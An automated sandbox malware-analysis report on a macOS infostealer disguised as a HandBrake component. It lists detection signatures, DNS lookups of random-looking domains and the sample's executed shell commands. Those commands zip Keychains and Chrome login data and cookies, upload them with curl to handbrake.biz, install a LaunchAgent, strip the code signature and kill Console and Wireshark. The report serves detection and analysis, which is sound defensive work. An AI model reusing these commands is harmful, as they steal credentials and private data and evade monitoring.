Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:19.0.0
Analysis ID:37267
Start time:16:25:03
Joe Sandbox Product:Cloud
Start date:09.05.2017
Overall analysis duration:0h 11m 19s
Report type:full
Sample file name:activity_agent.app.zip
Cookbook file name:default.jbs
Analysis system description:Mac Mini, El Capitan 10.11.6 (MS Office 15.25, Java 1.8.0_25)
Detection:MAL
Classification:mal100.troj.adwa.spyw.expl.evad.macZIP@0/37@27/0


Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious


Classification

Signature Overview

Click to jump to signature section


Cryptography:

barindex
Executes the "openssl" command used for crypographic operationsShow sources
Source: /bin/sh (PID: 581)Openssl executable: /usr/bin/openssl -> openssl rsautl -verify -in /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/.tmpdata -pubin -inkey /tmp/public.pem
Source: /bin/sh (PID: 598)Openssl executable: /usr/bin/openssl -> openssl rsautl -verify -in /tmp/au -pubin -inkey /tmp/au.pub
Writes files containing public keys to diskShow sources
Source: /bin/sh (PID: 580)File created 'PUBLIC KEY' pattern: /private/tmp/public.pem
Source: /bin/sh (PID: 595)File created 'PUBLIC KEY' pattern: /private/tmp/au.pub
Source: /bin/cp (PID: 663)File created 'PUBLIC KEY' pattern: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
Source: /usr/libexec/DeveloperTools/codesign_allocate (PID: 677)File created 'PUBLIC KEY' pattern: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent.cstemp

Networking:

barindex
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: script.google.com
Reads from file descriptors related to (network) socketsShow sources
Source: /usr/bin/curl (PID: 586)Reads from socket in process:
Source: /usr/bin/curl (PID: 597)Reads from socket in process:
Source: /usr/bin/curl (PID: 669)Reads from socket in process:
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49295 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49294 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49296 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49297 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49297
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49296
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49295
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49294
Writes from file descriptors related to (network) socketsShow sources
Source: /usr/bin/curl (PID: 586)Writes from socket in process:
Source: /usr/bin/curl (PID: 597)Writes from socket in process:
Source: /usr/bin/curl (PID: 669)Writes from socket in process:
Detected non-DNS traffic on DNS portShow sources
Source: global trafficTCP traffic: 192.168.0.50:49293 -> 8.8.8.8:53
Executes the "nc" (netcat) command used to establish arbitrary TCP or UDP connections and listensShow sources
Source: /bin/sh (PID: 583)Netcat executable: /usr/bin/nc -> nc -G 20 -z 8.8.8.8 53
Queries random domain names (often used to prevent blacklisting and sinkholes)Show sources
Source: unknownDNS traffic detected: English language letter occurancy does not match the domain names
Tries to resolve many domain names, but no domain seems validShow sources
Source: unknownDNS traffic detected: query: script.google.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: script.googleusercontent.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: handbrake.biz replaycode: Name error (3)
Source: unknownDNS traffic detected: query: handbrake.cc replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: handbrake.cc replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: handbrake.cc replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: luwenxdsnhgfxckcjgxvtugj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 6gmvshjdfpfbeqktpsde5xav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kjfnbfhu7ndudgzhxpwnnqkc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yaxw8dsbttpwrwlq3h6uc9eq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qrtfvfysk4bdcwwwe9pxmqe9.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qrtfvfysk4bdcwwwe9pxmqe9.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qrtfvfysk4bdcwwwe9pxmqe9.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qrtfvfysk4bdcwwwe9pxmqe9.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fyamakgtrrjt9vrwhmc76v38.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fyamakgtrrjt9vrwhmc76v38.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fyamakgtrrjt9vrwhmc76v38.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fyamakgtrrjt9vrwhmc76v38.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kcdjzquvhsua6hlfbmjzkzsb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ypu4vwlenkpt29f95etrqllq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ypu4vwlenkpt29f95etrqllq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ypu4vwlenkpt29f95etrqllq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ypu4vwlenkpt29f95etrqllq.com replaycode: Name error (3)

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.adwa.spyw.expl.evad.macZIP@0/37@27/0

Data Obfuscation:

barindex
Imports the IOKit library (often used to register services)Show sources
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Imports the Security library (often used for certificate, key, keychain, or secure transport handling)Show sources
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Persistence and Installation Behavior:

barindex
Creates application bundles containing icon filesShow sources
Source: /bin/cp (PID: 663)Icon file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/h.icns
Executes the "sed" command used to modify input streams (usually from files or pipes)Show sources
Source: /bin/sh (PID: 635)Sed executable: /usr/bin/sed -> sed s/^Path=//
Source: /bin/sh (PID: 641)Sed executable: /usr/bin/sed -> sed s/^Path=//
Source: /bin/sh (PID: 647)Sed executable: /usr/bin/sed -> sed s/^Path=//
Source: /bin/sh (PID: 653)Sed executable: /usr/bin/sed -> sed s/^Path=//
Source: /bin/sh (PID: 673)Sed executable: /usr/bin/sed -> sed -i -e s/P_MBN/fr.handbrake.activity_agent/g /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 674)Sed executable: /usr/bin/sed -> sed -i -e s=P_UPTH=/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent=g /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Reads data from the local random generatorShow sources
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Random device file read: /dev/random
Source: /usr/bin/openssl (PID: 581)Random device file read: /dev/urandom
Source: /usr/bin/curl (PID: 586)Random device file read: /dev/random
Source: /usr/bin/curl (PID: 586)Random device file read: /dev/random
Source: /usr/bin/curl (PID: 597)Random device file read: /dev/random
Source: /usr/bin/curl (PID: 597)Random device file read: /dev/random
Source: /usr/bin/openssl (PID: 598)Random device file read: /dev/urandom
Source: /usr/bin/zip (PID: 627)Random device file read: /dev/random
Source: /usr/bin/zip (PID: 655)Random device file read: /dev/random
Source: /usr/bin/zip (PID: 658)Random device file read: /dev/random
Source: /usr/bin/curl (PID: 669)Random device file read: /dev/random
Source: /usr/bin/curl (PID: 669)Random device file read: /dev/random
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Writes property list (.plist) files to diskShow sources
Source: /bin/cp (PID: 663)XML plist file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Info.plist
Source: /bin/cp (PID: 663)Binary plist file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/MainMenu.nib
Changes permissions of written Mach-O filesShow sources
Source: /bin/cp (PID: 663)Permissions modifiied for written 64-bit Mach-O /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent: bits: - usr: rx grp: rx all: rwx
Source: /usr/bin/codesign (PID: 676)Permissions modifiied for written 64-bit Mach-O /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent.cstemp: bits: - usr: rx grp: rx all: rwx
Creates application bundlesShow sources
Source: /bin/cp (PID: 663)Bundle Info.plist file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Info.plist
Creates hidden files, links and/or directoriesShow sources
Source: /bin/cp (PID: 663)Hidden file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/.hash
Source: /bin/cp (PID: 663)Hidden file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/.tmpdata
Source: /usr/bin/touch (PID: 670)Hidden file created: /Users/vreni/Library/VideoFrameworks/.ptrun
Source: /bin/sh (PID: 671)Hidden file created: /Users/vreni/Library/VideoFrameworks/.crd
Executes commands using a shell command-line interpreterShow sources
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c echo '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwUP19DdW2NlkkdovqqwF+r3sBaamka42zVMGa+COUCIysrVhVJIv4nmc57TLxgG8dsg+G0o0NQ75n898b04lYGve3gXGWJ8Y5OTJ16+RA4OtKAiO8v7qEGnQ/QpSzrLZPU3Yd60bAltYSvCCiOdBOKhOAiag0H39F2k5ea4zxt6TNDksW/o3+HcjzA4yy+C1tp2Cr4X37O5XMVZPWpMksIXPazh91tr0TJ2VFyx4btnDPajeOzhcKUA05Wrw+hagAZnFU9Bajx3KvdTlxsVxLmRc5r3IqDAsXTHH1jpmWMDiC9IGLDFPrN6NffAwjgSmsKhi1SC8yFHh0oPCswRhrQIDAQAB-----END PUBLIC KEY-----' > /tmp/public.pem openssl rsautl -verify -in /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/.tmpdata -pubin -inkey /tmp/public.pem
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c nc -G 20 -z 8.8.8.8 53 >/dev/null 2>&1 && echo success
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c hcresult=`curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec` && echo $hcresult
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c if [ -f /Users/vreni/Library/VideoFrameworks/.ptrun ] then echo success fi
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c sudo -k
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c echo '' | sudo -S echo success
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c a90=`curl -s --connect-timeout 10 -o /tmp/au https://handbrake.biz/rsa` && echo && echo '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Rp260Eq/1ZrGGMoHdIWvnOMvVYguY+DxDyHsgFGbYJPQOOkuwRvdyYnqqDvMFguNtQFVi5K35U6kv89aE8i2u8tY0efGwbTXLUIOCc7kCKzm6PcxmsIoDgsdndOriAfwSaKgsOYphOTrBsxuYe4W1f6gNj9cK0eicoizADsnlKInu+Im7xir+hdH58Kncs1gGTeo+QWyl3xpytjGkO2oVcfGbM7Xrgvc/ux49quE6lLNer3OlfORrGsSRoXcaaq7z6bjYB8U5oWJraD5heqGHT/FCarn/+qbwurWcpTmHCNPjr1+0K33XGKn6zYOT0mQ3kt2VmUUnKQhwUMs31tUwIDAQAB-----END PUBLIC KEY-----' > /tmp/au.pub && echo success
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c openssl rsautl -verify -in /tmp/au -pubin -inkey /tmp/au.pub
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 handbrake.biz 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 handbrakestore.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 handbrake.cc 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 luwenxdsnhgfxckcjgxvtugj.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 6gmvshjdfpfbeqktpsde5xav.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 kjfnbfhu7ndudgzhxpwnnqkc.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 yaxw8dsbttpwrwlq3h6uc9eq.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 qrtfvfysk4bdcwwwe9pxmqe9.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 fyamakgtrrjt9vrwhmc76v38.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 kcdjzquvhsua6hlfbmjzkzsb.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 ypu4vwlenkpt29f95etrqllq.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c mkdir -p /Users/vreni/Library/RenderFiles /Users/vreni/Library/VideoFrameworks ~/Library/LaunchAgents/ chmod -R 777 /Users/vreni/Library/RenderFiles /Users/vreni/Library/VideoFrameworks zip -r /Users/vreni/Library/VideoFrameworks/KC.zip ~/Library/Keychains/ /Library/Keychains/ zip /Users/vreni/Library/VideoFrameworks/CR.zip ~/Library/Application\ Support/Google/Chrome/Profile\ 1/Login\ Data ~/Library/Application\ Support/Google/Chrome/Profile\ 1/Cookies ~/Library/Application\ Support/Google/Chrome/Profile\ 1/Bookmarks ~/Library/Application\ Support/Google/Chrome/Profile\ 1/History ~/Library/Application\ Support/Google/Chrome/Profile\ 1/Web\ Data zip /Users/vreni/Library/VideoFrameworks/CR_def.zip ~/Library/Application\ Support/Google/Chrome/Default/Login\ Data ~/Library/Application\ Support/Google/Chrome/Default/Cookies ~/Library/Application\ Support/Google/Chrome/Default/Bookmarks ~/Library/Application\ Support/Google/Chrome/Default/History ~/Library/Application\ Support/Google/Chrome/Default/W
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c cp -R /Users/vreni/Desktop/unpack/activity_agent.app /Users/vreni/Library/RenderFiles/activity_agent.app mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/Info_.plist /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Info.plist mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/fr.handbrake.activity_agent.plist ~/Library/LaunchAgents/fr.handbrake.activity_agent.plist echo success
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c a1494347197=`curl -s -F full_name='vreni' -F username='vreni' -F password='' -F root_password='failure' -F serial='C07N355HDWYL' -F hostname='vreni%E2%80%99s Mac mini' -F signed='0' -F file='@/Users/vreni/Library/VideoFrameworks/proton.zip' -F api_key=9fe4a0c3b63203f096ef65dc98754243979d6bd58fe835482b969aabaaec57ea -F cts=1494347197 -F signature=77aa1c7aafbc61542eb30c0f1a1cb7f29c68adcaf5dbaa73561688d648c4f7b6 https://handbrake.biz/api/init` echo $a1494347197
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c touch /Users/vreni/Library/VideoFrameworks/.ptrun
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c echo 'vreni::59786d197c6e371c157dffe729774a4009357f5771e09e116e7e47814412661a96d8eee899399a89a005ab084dd231d25d11bde5e94d557a4b4ba965c44a4e53' > /Users/vreni/Library/VideoFrameworks/.crd
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c sed -i -e 's/P_MBN/fr.handbrake.activity_agent/g' ~/Library/LaunchAgents/fr.handbrake.activity_agent.plist sed -i -e 's=P_UPTH=/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent=g' ~/Library/LaunchAgents/fr.handbrake.activity_agent.plist chmod 644 ~/Library/LaunchAgents/fr.handbrake.activity_agent.plist codesign --remove-signature /Users/vreni/Library/RenderFiles/activity_agent.app rm -rf /Users/vreni/Library/RenderFiles/activity_agent.app/Ic* launchctl load ~/Library/LaunchAgents/fr.handbrake.activity_agent.plist killall Console killall Wireshark rm -rf /Users/vreni/Desktop/unpack/activity_agent.app
Executes the "chmod" command used to modify permissionsShow sources
Source: /bin/sh (PID: 626)Chmod executable: /bin/chmod -> chmod -R 777 /Users/vreni/Library/RenderFiles /Users/vreni/Library/VideoFrameworks
Source: /bin/sh (PID: 675)Chmod executable: /bin/chmod -> chmod 644 /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Executes the "curl" command used to transfer data via the network (usually using HTTP/S)Show sources
Source: /bin/sh (PID: 586)Curl executable: /usr/bin/curl -> curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Source: /bin/sh (PID: 597)Curl executable: /usr/bin/curl -> curl -s --connect-timeout 10 -o /tmp/au https://handbrake.biz/rsa
Source: /bin/sh (PID: 669)Curl executable: /usr/bin/curl -> curl -s -F full_name=vreni -F username=vreni -F password= -F root_password=failure -F serial=C07N355HDWYL -F hostname=vreni%E2%80%99s Mac mini -F signed=0 -F file=@/Users/vreni/Library/VideoFrameworks/proton.zip -F api_key=9fe4a0c3b63203f096ef65dc98754243979d6bd58fe835482b969aabaaec57ea -F cts=1494347197 -F signature=77aa1c7aafbc61542eb30c0f1a1cb7f29c68adcaf5dbaa73561688d648c4f7b6 https://handbrake.biz/api/init
Executes the "grep" command used to find patterns in files or piped streamsShow sources
Source: /bin/sh (PID: 632)Grep executable: /usr/bin/grep -> grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 634)Grep executable: /usr/bin/grep -> grep Path= profiles.ini
Source: /bin/sh (PID: 638)Grep executable: /usr/bin/grep -> grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 640)Grep executable: /usr/bin/grep -> grep Path= profiles.ini
Source: /bin/sh (PID: 644)Grep executable: /usr/bin/grep -> grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 646)Grep executable: /usr/bin/grep -> grep Path= profiles.ini
Source: /bin/sh (PID: 650)Grep executable: /usr/bin/grep -> grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 652)Grep executable: /usr/bin/grep -> grep Path= profiles.ini
Executes the "mkdir" command used to create foldersShow sources
Source: /bin/sh (PID: 625)Mkdir executable: /bin/mkdir -> mkdir -p /Users/vreni/Library/RenderFiles /Users/vreni/Library/VideoFrameworks /Users/vreni/Library/LaunchAgents/
Executes the "ping" command used for connectivity testing via ICMPShow sources
Source: /bin/sh (PID: 600)Ping executable: /sbin/ping -> ping -c 1 handbrake.biz
Source: /bin/sh (PID: 604)Ping executable: /sbin/ping -> ping -c 1 handbrakestore.com
Source: /bin/sh (PID: 606)Ping executable: /sbin/ping -> ping -c 1 handbrake.cc
Source: /bin/sh (PID: 609)Ping executable: /sbin/ping -> ping -c 1 luwenxdsnhgfxckcjgxvtugj.com
Source: /bin/sh (PID: 611)Ping executable: /sbin/ping -> ping -c 1 6gmvshjdfpfbeqktpsde5xav.com
Source: /bin/sh (PID: 613)Ping executable: /sbin/ping -> ping -c 1 kjfnbfhu7ndudgzhxpwnnqkc.com
Source: /bin/sh (PID: 615)Ping executable: /sbin/ping -> ping -c 1 yaxw8dsbttpwrwlq3h6uc9eq.com
Source: /bin/sh (PID: 617)Ping executable: /sbin/ping -> ping -c 1 qrtfvfysk4bdcwwwe9pxmqe9.com
Source: /bin/sh (PID: 619)Ping executable: /sbin/ping -> ping -c 1 fyamakgtrrjt9vrwhmc76v38.com
Source: /bin/sh (PID: 621)Ping executable: /sbin/ping -> ping -c 1 kcdjzquvhsua6hlfbmjzkzsb.com
Source: /bin/sh (PID: 623)Ping executable: /sbin/ping -> ping -c 1 ypu4vwlenkpt29f95etrqllq.com
Executes the "touch" command used to create files or modify time stampsShow sources
Source: /bin/sh (PID: 670)Touch executable: /usr/bin/touch -> touch /Users/vreni/Library/VideoFrameworks/.ptrun
Explicitly loads/starts launch servicesShow sources
Source: /bin/sh (PID: 679)Launch agent/daemon loaded: launchctl load /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Reads launchservices plist filesShow sources
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices.plist
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Reads user launchservices plist file containing default apps for corresponding filetypesShow sources
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Preferences launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Uses Security framework containing interfaces for system-level user authentication and authorizationShow sources
Source: /usr/bin/codesign (PID: 676)Security framework info plist opened: /System/Library/Frameworks/Security.framework/Resources/Info.plist
Writes 64-bit Mach-O files to diskShow sources
Source: /bin/cp (PID: 663)File written: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
Source: /usr/libexec/DeveloperTools/codesign_allocate (PID: 677)File written: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent.cstemp
Writes ZIP files to diskShow sources
Source: /usr/bin/zip (PID: 627)ZIP file created: /Users/vreni/Library/VideoFrameworks/zihaRvzn
Source: /usr/bin/zip (PID: 655)ZIP file created: /Users/vreni/Library/VideoFrameworks/ziSznLAI
Source: /usr/bin/zip (PID: 658)ZIP file created: /Users/vreni/Library/VideoFrameworks/ziHyh3w6
Writes icon files to diskShow sources
Source: /bin/cp (PID: 663)File written: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/h.icns
Writes shell script files to diskShow sources
Source: /bin/cp (PID: 663)Shell script file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/mozilla.sh
Executes the "rm" command used to delete files or directoriesShow sources
Source: /bin/sh (PID: 661)Rm executable: /bin/rm -> rm -rf grace_period
Source: /bin/sh (PID: 678)Rm executable: /bin/rm -> rm -rf /Users/vreni/Library/RenderFiles/activity_agent.app/Ic*
Source: /bin/sh (PID: 682)Rm executable: /bin/rm -> rm -rf /Users/vreni/Desktop/unpack/activity_agent.app
Executes the "sudo" command used to execute a command as another userShow sources
Source: /bin/sh (PID: 589)Sudo executable: /usr/bin/sudo -> sudo -k
Source: /bin/sh (PID: 592)Sudo executable: /usr/bin/sudo -> sudo -S echo success
Many shell processes execute programs via execve syscall (may be indicative for malicious behaviour)Show sources
Source: /bin/sh (PID: 581)Shell process: openssl rsautl -verify -in /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/.tmpdata -pubin -inkey /tmp/public.pem
Source: /bin/sh (PID: 583)Shell process: nc -G 20 -z 8.8.8.8 53
Source: /bin/sh (PID: 586)Shell process: curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Source: /bin/sh (PID: 589)Shell process: sudo -k
Source: /bin/sh (PID: 592)Shell process: sudo -S echo success
Source: /bin/sh (PID: 597)Shell process: curl -s --connect-timeout 10 -o /tmp/au https://handbrake.biz/rsa
Source: /bin/sh (PID: 598)Shell process: openssl rsautl -verify -in /tmp/au -pubin -inkey /tmp/au.pub
Source: /bin/sh (PID: 600)Shell process: ping -c 1 handbrake.biz
Source: /bin/sh (PID: 604)Shell process: ping -c 1 handbrakestore.com
Source: /bin/sh (PID: 606)Shell process: ping -c 1 handbrake.cc
Source: /bin/sh (PID: 609)Shell process: ping -c 1 luwenxdsnhgfxckcjgxvtugj.com
Source: /bin/sh (PID: 611)Shell process: ping -c 1 6gmvshjdfpfbeqktpsde5xav.com
Source: /bin/sh (PID: 613)Shell process: ping -c 1 kjfnbfhu7ndudgzhxpwnnqkc.com
Source: /bin/sh (PID: 615)Shell process: ping -c 1 yaxw8dsbttpwrwlq3h6uc9eq.com
Source: /bin/sh (PID: 617)Shell process: ping -c 1 qrtfvfysk4bdcwwwe9pxmqe9.com
Source: /bin/sh (PID: 619)Shell process: ping -c 1 fyamakgtrrjt9vrwhmc76v38.com
Source: /bin/sh (PID: 621)Shell process: ping -c 1 kcdjzquvhsua6hlfbmjzkzsb.com
Source: /bin/sh (PID: 623)Shell process: ping -c 1 ypu4vwlenkpt29f95etrqllq.com
Source: /bin/sh (PID: 625)Shell process: mkdir -p /Users/vreni/Library/RenderFiles /Users/vreni/Library/VideoFrameworks /Users/vreni/Library/LaunchAgents/
Source: /bin/sh (PID: 626)Shell process: chmod -R 777 /Users/vreni/Library/RenderFiles /Users/vreni/Library/VideoFrameworks
Source: /bin/sh (PID: 627)Shell process: zip -r /Users/vreni/Library/VideoFrameworks/KC.zip /Users/vreni/Library/Keychains/ /Library/Keychains/
Source: /bin/sh (PID: 628)Shell process: zip /Users/vreni/Library/VideoFrameworks/CR.zip /Users/vreni/Library/Application Support/Google/Chrome/Profile 1/Login Data /Users/vreni/Library/Application Support/Google/Chrome/Profile 1/Cookies /Users/vreni/Library/Application Support/Google/Chrome/Profile 1/Bookmarks /Users/vreni/Library/Application Support/Google/Chrome/Profile 1/History /Users/vreni/Library/Application Support/Google/Chrome/Profile 1/Web Data
Source: /bin/sh (PID: 629)Shell process: zip /Users/vreni/Library/VideoFrameworks/CR_def.zip /Users/vreni/Library/Application Support/Google/Chrome/Default/Login Data /Users/vreni/Library/Application Support/Google/Chrome/Default/Cookies /Users/vreni/Library/Application Support/Google/Chrome/Default/Bookmarks /Users/vreni/Library/Application Support/Google/Chrome/Default/History /Users/vreni/Library/Application Support/Google/Chrome/Default/Web Data
Source: /bin/sh (PID: 631)Shell process: sh /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/mozilla.sh
Source: /bin/sh (PID: 632)Shell process: grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 634)Shell process: grep Path= profiles.ini
Source: /bin/sh (PID: 635)Shell process: sed s/^Path=//
Source: /bin/sh (PID: 637)Shell process: sh /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/mozilla.sh
Source: /bin/sh (PID: 638)Shell process: grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 640)Shell process: grep Path= profiles.ini
Source: /bin/sh (PID: 641)Shell process: sed s/^Path=//
